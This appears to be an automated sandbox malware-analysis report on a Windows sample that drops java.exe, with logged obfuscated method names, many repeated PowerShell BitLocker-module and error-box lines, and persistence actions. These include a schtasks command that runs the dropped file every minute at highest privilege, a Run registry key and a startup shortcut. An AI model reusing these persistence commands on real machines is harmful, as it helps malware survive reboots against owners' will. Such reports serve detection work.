                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.csHigh entropy of concatenated method names: 'IHQS8QYOd9moTDSEanN1sjHTnpWeVVazAJmyR9eXcJg22lwl2vE8', 'zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO', 'cNG5tRkwJTR1ownoIngSH7wBj8bt7IRyOUY9vaZXQLTuS2bXnPHQ', 'Br5UcZpabKJNZniYHTkCKnrvNKecH9pu1ObE2kgcIm0LwOIZstUm', '_1XkoJBGYXI6Z5TAuHXWFwe05mpfAG86pKq3f5qWypCZiKa9AKaOA', 'wys04OiEHyhSCtRbRseGjbugPF7ntCeFw0li8k7sJRhikp9BNBhpjMvIueNt5OPD1TdzFUfdv7X9kSAsiTRr', '_8gJipHAkBOqFIWaBgGBlKaW0AmEicjychUwFToOPojJWifOGQkH8S8Eg8nKD1zbCIJztDwru95y4B72UbmvO', '_2rbEPVG6nb4uL4UdI1gmoLv4qa8i3dmTxMOrxQTkScGFm6UmrRsQRMlUmzj8kSrxqjNEjzS0slfXAFfWWwcn', 'uL1DwVlYMUkTdnhwnmAnaqk0tt6mayGu1ElOOdpSpuRwHa7BetGSQvHbsyH7BnrCgRzM8tAhbcAEMZzSZgbV', 'Fa7heNWSiOMFvASfglCx9UqGjkwzm7pMdqK9RS7xVOCZbiMmKjab3hMRz0tT792MRNSD7TJ5EiEAOwT3ZpIn'
                      Source: java.exe.0.dr, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.csHigh entropy of concatenated method names: '_0sZQYedQljFSbXXuOyuPxQdGKQELj0m0REObc239KzIUZYGFf8ji5CEhsB9mIjAddO3ohy', 'BoHDOoCcD96rKe1oXlAqYjRFAk0e6ec6EPHPZRhV0073w7ZsAmJ344EEwcvWomFToSvgGQ', 'GpBfp25jiKTpysZ8XZxqlnl6JGyhJouJZxiVO27sSSfNWyWreFw1TGubxx0XPZiuVqxIVw', 'TStr6eh2tebBwJcgyoRwvx7j2JeAoS8V2KRIGrRtfb2mBuegLPYnVhtGR8aR7xSVZedbu3', 'H4XDsSzLbdVnNJNuAicSH4sSiDVURiJiznnTy4I7V6d2QlycoWNrnMXzFIqGohSlLouYBl', 'hVsQkBRc0RNdXppjpR6d5e7aV8pXHXKLMIhwTZN0nP6m9Kq4KEwRLaKrf7n4Vig6INZC3A', 'BXnUn5K2xegL2grzQdkWolfQgjEcKm5rIyJ1CTbA4INmuTpelc6uihWmvOSKEHg9V1emDt', 'hrQJ8hfahL8zJzaOiYNo1ikssYmRGBdaX2uXlntMxnrjvOME4uj4qAqywRiqcCT5LPdKmh', 'Id2EO9nStfroOxv9GFmQk4t4x3K2Na4glKwMgpE7ebwcj54DStsQRul4M5E6PdMMt5fXl8', 'BxXFvzqTQ3Pkl8o8oA2wA3Ullqj3oMLgFJwMj8qcOWXModCyuxpSas54zQhD8pX2nztdKw'
                      Source: java.exe.0.dr, Cqf5ySADqnBBZJSGBs6XL0JHhzclJSTcTFxQnT47pV9tLeSqr21xtsUx8EfmB3gZ47HrV3.csHigh entropy of concatenated method names: 'RqwE2GFuZfPUcJIcLBq3XX4TWcKN4NeBcC3owGqrsHgnPg8fcDMT2FTM9u1BPz1gWVKCDD', 'LwgBdoAJo6UU7T6dX82c19OKryiQHMZMkjG5iR5wKHkDuWH9J63uF0VR8pTKfHq0oHreUv', 'aHot2acFS5B8E3y8257ImU23ft1YZ14AKlcRbyr34qG9pMqHRLBWFYRSnBU33sxUNVLh2m', 'EY3Vih6tyin3ziN3AUFlzEoGl6pVfBhktI7RZapZwNVHIzaooGjR4CQwfclTcgNLdIfTNB', 'wf4G9slVDSMC', 'd4xfPfAvuBgg', 'MkVl2W4HuHga', 'vZnHyxzgm4el', 'zBnj4uHa8HGC', 'qSZb8axXCDZm'
                      Source: java.exe.0.dr, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.csHigh entropy of concatenated method names: 'T6K5wpb8o6jbbx1kRkiuj8cGRFvn9UfmJ2j1BgmUx0J2PCOR4qkwF26LHswdenuZ22A2Ht', '_55GbWsfTknBQ', 'lACv4mMLFCLy', 'RJcVX7XqfS8N', 'zsv7fUUItM9C'
                      Source: java.exe.0.dr, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csHigh entropy of concatenated method names: 'ytTJeaHBMZWBiKLPVFx3poRI0l1uJwq0MUUgA8FLnqh9ETdaW7FY', 'Jx1mjn7Ud3qlURoYy7Sl2fJeczHcya1KYR2LGeW7CWXovlBOm4Rq', 'sHt8heCBFmzo5DkswFX462I6hvwWcUBpif9DL5l4kfjgbAUiV2RT', 'kBG0UhwPFOGO8FOQQ5cnkUwRUOpIylq2KodeXX1X1VG5SSnQzKhF', 'jlZa1r2qdPhVrr8uGw7G0ujhhNuI1BVuAtn25R3MKoupMxAMYEGP', 'Z1fBvyDWNF6wNdzBrOYiHjiStu6o0p6NHe7zx88ogEZrkG1Emunx', 'fINzRsqpdNko3zAGgDDZSjwe7f9smxUwQTeLosUKDlP6RlkjEy7u', 'QhsO9etZ7leq4WlTrjoU9HrouhZrSiUdFfehMlFa1nsAfjD72vWy', 'JvH9qnWkWtw7IA4fjdNRFNhtCcOyxZJE9qLaM3VnZaxk7BwUOvc6', 'uVyEk9STM7Rev1s2XkUokUU0nRPcC2LphqvF5v8wTU4wjcWcH5zy'
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\java.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run java C:\Users\user\AppData\Roaming\java.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnkJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnkJump to behavior
                      Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run javaJump to behavior
                      Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run javaJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\file.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\F6B74C14BDC1CCC7FF6E 88D9A666AFE4B49FD15B45F1DC568347855CF049E54918D00BAF1610AE750872Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
